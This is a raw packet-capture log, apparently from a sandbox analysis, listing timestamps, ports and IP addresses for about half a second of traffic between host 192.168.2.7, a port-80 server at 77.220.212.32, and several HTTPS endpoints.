Nov 9, 2024 02:47:33.894208908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894216061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894345999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894509077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894551039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894556999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894563913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894635916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894639015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894684076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894747972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894766092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894778013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894797087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894809961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894810915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894824028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894846916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894865036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894871950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894884109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894889116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894907951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894937992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895347118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895401955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895510912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895523071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895540953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895553112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895564079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895565033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895576954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895589113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895606041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895618916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895627975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895632029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895643950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895663023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895668030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895675898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895688057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.895716906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.895754099 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.896214962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896255970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.896290064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896302938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896313906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896326065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896341085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.896343946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896358013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896373034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896375895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.896389008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896400928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.896403074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.896425962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.896442890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898170948 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.898185015 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.898211002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898236990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898248911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898262978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898269892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898288965 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898319960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898325920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898351908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898355961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898365974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898406029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898435116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898459911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898471117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898482084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898494005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898502111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898507118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898519993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898523092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898533106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898547888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.898550034 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898559093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.898595095 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.899198055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899224997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899246931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899261951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899266958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.899267912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899275064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899280071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899285078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899291039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899302959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899318933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899328947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899341106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899352074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.899353027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.899372101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.899396896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.900036097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.900048018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.900060892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.900072098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.900095940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.900124073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.908624887 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.911422968 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.911505938 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.911711931 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.911726952 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.914545059 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.914554119 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.914967060 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.914980888 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.915057898 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.915066004 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.915132046 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.915709019 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.923218966 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.923952103 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.923975945 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.925051928 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.925126076 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.926388979 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.926491022 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.926808119 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.926815987 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.928236961 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.928306103 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.928673983 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.928680897 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.928853989 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.928879023 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.929622889 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.929632902 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.930188894 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.930193901 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.938800097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.938812017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.938824892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.938864946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.938894987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.944829941 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.959568977 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.959594965 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.959675074 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.959686041 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.959697008 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.959734917 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.959759951 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.968312979 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.968875885 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.968928099 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.977248907 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.977324963 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:33.977375031 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.977478981 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.982943058 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.983058929 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.985905886 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.985915899 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.986347914 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:33.986365080 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:33.987519979 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:33.987588882 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:33.988071918 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.988085985 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.988099098 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.988105059 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.990010977 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.990017891 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.991879940 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.991889000 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.992033958 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.992038965 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.999366045 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:33.999480963 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:33.999593019 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:34.000711918 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.000725031 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.000790119 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.002825975 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.002860069 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.002927065 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.006438017 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.006990910 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.007011890 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.007364988 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.007831097 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.007889032 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.008567095 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.008588076 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.008652925 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.008755922 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.008773088 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.008918047 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.009061098 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.009083033 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.009190083 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.009274006 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.009282112 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.009342909 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.009569883 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.009581089 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.009638071 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.010020971 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.010534048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010569096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010581970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010591984 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010607958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010613918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010621071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010632992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010643959 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010643959 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010663033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010675907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010699034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010766029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010782003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010807037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010818005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010832071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010853052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010864019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010880947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010896921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010902882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010914087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010924101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010945082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010962009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010971069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.010974884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010993958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.010998964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011007071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011024952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011043072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011061907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011080027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011090994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011101961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011107922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011115074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011126995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011137009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011137962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011152029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011167049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011172056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011188984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011192083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011208057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011244059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011245012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011257887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011307001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011342049 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.011353016 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.011502028 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.011511087 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.011822939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011832952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011846066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011873007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011903048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.011962891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011975050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011982918 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.011986017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.011996031 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.012002945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012007952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012015104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012022018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012027979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012039900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012052059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012062073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012063980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012080908 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012094975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012094021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012114048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012124062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012125969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012142897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012146950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012155056 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012161016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012182951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012195110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012197018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012207031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012217999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012224913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012232065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012249947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012252092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012262106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012274027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012274027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012291908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012304068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012315035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012315989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012331009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012335062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012346029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012347937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012360096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012372017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012375116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012384892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012403011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012415886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012428045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012439013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012439013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012451887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012456894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012464046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012480974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012486935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012494087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012506008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012516022 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012528896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012537956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012542009 CET	80	52982	77.220.212.32	192.168.2.7
